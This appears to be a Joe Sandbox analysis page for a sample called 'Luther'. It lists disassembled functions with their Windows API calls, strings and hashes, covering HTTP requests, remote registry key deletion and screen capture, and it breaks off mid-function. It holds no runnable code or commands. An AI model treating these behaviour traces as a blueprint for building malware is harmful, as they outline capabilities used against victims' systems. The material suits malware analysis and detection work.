Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 2daf46fa9eea32bfd545c40272c15f8f2a1a6222cf751de8c40dd9d0f935fdb2
Instruction ID: 8ddca4cb733831560c453ec9cc3483c9c9fd46989294543b79658301ce87cbcf
Opcode Fuzzy Hash: 2daf46fa9eea32bfd545c40272c15f8f2a1a6222cf751de8c40dd9d0f935fdb2
Instruction Fuzzy Hash: AC715470108344AFD7258F18CD48F6ABBF9FB89308F04546EF985A7261C772A946DF21

Function 00EC9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

DragQueryPoint.SHELL32(?,?), ref: 00EC9BA3

Part of subcall function 00EC80AE: ClientToScreen.USER32(?,?), ref: 00EC80D4
Part of subcall function 00EC80AE: GetWindowRect.USER32(?,?), ref: 00EC814A
Part of subcall function 00EC80AE: PtInRect.USER32(?,?,?), ref: 00EC815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EC9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EC9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EC9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9CD3
DragFinish.SHELL32(?), ref: 00EC9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00EC9DCD

Strings

@GUI_DRAGID, xrefs: 00EC9D45
@GUI_DRAGFILE, xrefs: 00EC9D7C
@GUI_DROPID, xrefs: 00EC9CFA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: e78eca62b6d1321b96ad6970d0d81ffa8af0e0320be5fc53f3c56f535e15f69c
Instruction ID: 3da32287fb411f01d49c778746b1841c61787390e37c284ab7ac4893cc05eaa9
Opcode Fuzzy Hash: e78eca62b6d1321b96ad6970d0d81ffa8af0e0320be5fc53f3c56f535e15f69c
Instruction Fuzzy Hash: BB615F71108305AFC705DF50DC89EAFBBE8FF88750F40192DF696A21A1DB71964ACB52

Function 00EACEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EACEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EACF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EACF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EACF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EACF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EACF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EACF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EACFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAD035
InternetCloseHandle.WININET(00000000), ref: 00EAD040

Strings

, xrefs: 00EACFBA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: bac63f7352e590c1b8007c66bbe8656a08b403eed847fb688a2b86c4aa738e37
Instruction ID: b777d7154c8029a4918f23f814734c18b4b536d861b41ed032d1d14278ad42d6
Opcode Fuzzy Hash: bac63f7352e590c1b8007c66bbe8656a08b403eed847fb688a2b86c4aa738e37
Instruction Fuzzy Hash: 8551B2B1504604BFD7218F61CC88EAB7BFDFF0D748F10542AF946AA510D736E94A9B60

Function 00EC8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EC66D6,?,?), ref: 00EC8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9016
GlobalLock.KERNEL32(00000000), ref: 00EC9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9033
GlobalUnlock.KERNEL32(00000000), ref: 00EC903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED0C04,?), ref: 00EC906D
GlobalFree.KERNEL32(00000000), ref: 00EC907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00EC909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00EC90CD
DeleteObject.GDI32(00000000), ref: 00EC90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EC910B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2dd8c538b8b45e4d8dd8176ca2609ee1499c612e491580c6724bb63056e098fb
Instruction ID: 4443fc69450fa0a2eb45fcaa425e477d61482ac1c3f4b79473fa218743489f7e
Opcode Fuzzy Hash: 2dd8c538b8b45e4d8dd8176ca2609ee1499c612e491580c6724bb63056e098fb
Instruction Fuzzy Hash: C9414871600208BFDB119F66DD8DEAABBB8FF89715F104068F905E7261D7329906CB20

Function 00EBC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00EBC26A
RegCloseKey.ADVAPI32(?), ref: 00EBC2DE
RegCloseKey.ADVAPI32(?), ref: 00EBC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EBC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBC382
FreeLibrary.KERNEL32(00000000), ref: 00EBC3E3
RegCloseKey.ADVAPI32(00000000), ref: 00EBC3F4

Strings

RegDeleteKeyExW, xrefs: 00EBC35E
advapi32.dll, xrefs: 00EBC34D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: a72a7cac3f8f3d6a12d26d975f6e06437448a19ce81c7f64f17eec2f023c0cbf
Instruction ID: d177ac535804968987ac627a9ba1eb4baa219b2c5b3df4daf919807a73e1fdd0
Opcode Fuzzy Hash: a72a7cac3f8f3d6a12d26d975f6e06437448a19ce81c7f64f17eec2f023c0cbf
Instruction Fuzzy Hash: 23C18274208601AFD714DF14C895F6ABBE1BF44308F64949CF456AB3A2CB72ED46CB91

Function 00EB2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00EB3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EB3045
CreateCompatibleDC.GDI32(?), ref: 00EB3051
SelectObject.GDI32(00000000,?), ref: 00EB305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EB30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EB312D
SelectObject.GDI32(?,?), ref: 00EB3135
DeleteObject.GDI32(?), ref: 00EB313E
DeleteDC.GDI32(?), ref: 00EB3145
ReleaseDC.USER32(00000000,?), ref: 00EB3150

Strings

(, xrefs: 00EB30EA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ff97b72ee787c99abf04e9ef56016ec2ce19e3cedd5eb3cee6635b7565092aa2
Instruction ID: 57fac145aeb043dc05a7ce9caf29ed398e5c62f409611f74a9fcfb5ad239045d
Opcode Fuzzy Hash: ff97b72ee787c99abf04e9ef56016ec2ce19e3cedd5eb3cee6635b7565092aa2
Instruction Fuzzy Hash: 8361E1B5904219AFCB05CFA8DC85EAEBBF6FF48310F208529E955B7250D772A941CB90

Function 00ECA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

GetSystemMetrics.USER32(0000000F), ref: 00ECA990
GetSystemMetrics.USER32(00000011), ref: 00ECA9A7
GetSystemMetrics.USER32(00000004), ref: 00ECA9B3
GetSystemMetrics.USER32(0000000F), ref: 00ECA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00ECAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ECAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ECAC54
ShowWindow.USER32(00000003,00000000), ref: 00ECAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00ECAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00ECACBB

Strings

@, xrefs: 00ECABD0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 98b70d4bad40248e8c12bebf87be7334554ab3fe9cda25166548b70b49b2c99d
Instruction ID: 0b4608ff2b3e111111a19254d4de95a22fae5b4b0702cfc298b1bc4a52058a66
Opcode Fuzzy Hash: 98b70d4bad40248e8c12bebf87be7334554ab3fe9cda25166548b70b49b2c99d
Instruction Fuzzy Hash: EFB18B31600219DFCF14CF69CA89BAE7BF2BF44708F189079EC44AA295D772A981CB51

Function 00E952AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00E952E6
GetWindowTextW.USER32(?,?,00000400), ref: 00E95328
_wcslen.LIBCMT ref: 00E95339
CharUpperBuffW.USER32(?,00000000), ref: 00E95345
_wcsstr.LIBVCRUNTIME ref: 00E9537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00E953B2
GetWindowTextW.USER32(?,?,00000400), ref: 00E953EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00E95445
GetClassNameW.USER32(?,?,00000400), ref: 00E95477
GetWindowRect.USER32(?,?), ref: 00E954EF

Strings

ThumbnailClass, xrefs: 00E953BD, 00E95450

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 0e4481e06d00534feeea9656d662f672d8849a9938c6ebcf59271c6dcedd4322
Instruction ID: a88d37ffe73b657724002a5595934c9efe0b7e32b17c597599f13f8a78a686fd
Opcode Fuzzy Hash: 0e4481e06d00534feeea9656d662f672d8849a9938c6ebcf59271c6dcedd4322
Instruction Fuzzy Hash: 8491E772104B06AFDF05DF24C895BA9B7E9FF01308F40552DFA9AA2091EB31ED56CB91

Function 00EC976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC97B6
GetFocus.USER32 ref: 00EC97C6
GetDlgCtrlID.USER32(00000000), ref: 00EC97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00EC9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EC992B
GetMenuItemCount.USER32(?), ref: 00EC9948
GetMenuItemID.USER32(?,00000000), ref: 00EC9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EC998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EC99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EC99FD

Strings

0, xrefs: 00EC98FB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 9d1cf4a858155919518f577e498e5500216edd602f929bbb2d2cefb68317ad4f
Instruction ID: 33002c1ad3b7c19be895b3f3c49d6548ee40ceec283bafe9016660c9449b7b1e
Opcode Fuzzy Hash: 9d1cf4a858155919518f577e498e5500216edd602f929bbb2d2cefb68317ad4f
Instruction Fuzzy Hash: 12819F715083019FD714CF25CA89FAB7BE8BB89718F00192DF985B7292D772D906CB62

Function 00E9C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00F029C0,000000FF,00000000,00000030), ref: 00E9C973
SetMenuItemInfoW.USER32(00F029C0,00000004,00000000,00000030), ref: 00E9C9A8
Sleep.KERNEL32(000001F4), ref: 00E9C9BA
GetMenuItemCount.USER32(?), ref: 00E9CA00
GetMenuItemID.USER32(?,00000000), ref: 00E9CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00E9CA49
GetMenuItemID.USER32(?,?), ref: 00E9CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E9CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9CB0C

Strings

0, xrefs: 00E9C904

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 999dec0fec1e96028b261af751bf2b5419009b631dc11946072dd75e122a63e9
Instruction ID: 359286ff41967bdf997d03b280f4be0830c1a85645670ee825231f68c76cccfc
Opcode Fuzzy Hash: 999dec0fec1e96028b261af751bf2b5419009b631dc11946072dd75e122a63e9
Instruction Fuzzy Hash: 84619D70A00249AFDF11EF68CD89EEEBBB8FB05348F241425E916B3291D771AD05CB61

Function 00E9E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E9E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E9E4FA
_wcslen.LIBCMT ref: 00E9E504
_wcsstr.LIBVCRUNTIME ref: 00E9E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E9E570

Strings

%u.%u.%u.%u, xrefs: 00E9E64E
04090000, xrefs: 00E9E5A6
\VarFileInfo\Translation, xrefs: 00E9E568
StringFileInfo\, xrefs: 00E9E543
DefaultLangCodepage, xrefs: 00E9E5D3

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d4a3bca78059b07550ff6266ff2c726771f9b607275bd308605fdb5f30381de0
Instruction ID: a13c421dbe09e93e324de1a20a40de0e7ca625d050f69433e7ecdb48f7f2e408
Opcode Fuzzy Hash: d4a3bca78059b07550ff6266ff2c726771f9b607275bd308605fdb5f30381de0
Instruction Fuzzy Hash: 32411372504314BAEB00EB648D47EFF77ACDF51711F00246AFE01B6283EB769A05D2A5

Function 00EBD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBD6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EBD6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBD7A8

Part of subcall function 00EBD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EBD70A
Part of subcall function 00EBD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EBD71D
Part of subcall function 00EBD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBD72F
Part of subcall function 00EBD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBD765
Part of subcall function 00EBD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBD788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBD753

Strings

RegDeleteKeyExW, xrefs: 00EBD729
advapi32.dll, xrefs: 00EBD718

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 48844f2af491a79002527c25bfebcca89de0f36ee39f1615facbb1039f64f42b
Instruction ID: 74f2a85884240efc344d33cb87fabbe01b79c7d9f742c6bcbaafb577ba9e8298
Opcode Fuzzy Hash: 48844f2af491a79002527c25bfebcca89de0f36ee39f1615facbb1039f64f42b
Instruction Fuzzy Hash: ED318F75A05129BFDB219B91DC88EFFBB7CEF45754F000076B905F2100EB359E4A9AA0

Function 00E9EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E9EFCB

Part of subcall function 00E4F215: timeGetTime.WINMM(?,?,00E9EFEB), ref: 00E4F219

Sleep.KERNEL32(0000000A), ref: 00E9EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E9F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E9F03E
SetActiveWindow.USER32 ref: 00E9F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9F08A
Sleep.KERNEL32(000000FA), ref: 00E9F095
IsWindow.USER32 ref: 00E9F0A1
EndDialog.USER32(00000000), ref: 00E9F0B2

Strings

BUTTON, xrefs: 00E9F030

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a457b31fe06b7ff8bfec390849533f5b9c4e31a083c43a3bc4ca958eca01e566
Instruction ID: ade70825b81e7db2f189e0e8fa131136aca975bc4aa12c156423e64d29415e60
Opcode Fuzzy Hash: a457b31fe06b7ff8bfec390849533f5b9c4e31a083c43a3bc4ca958eca01e566
Instruction Fuzzy Hash: 4F219671204208BFEB116F31EC89E667BADF745749B052035FA05F2272CB734C56DA61

Function 00E9F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E9F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9F39B
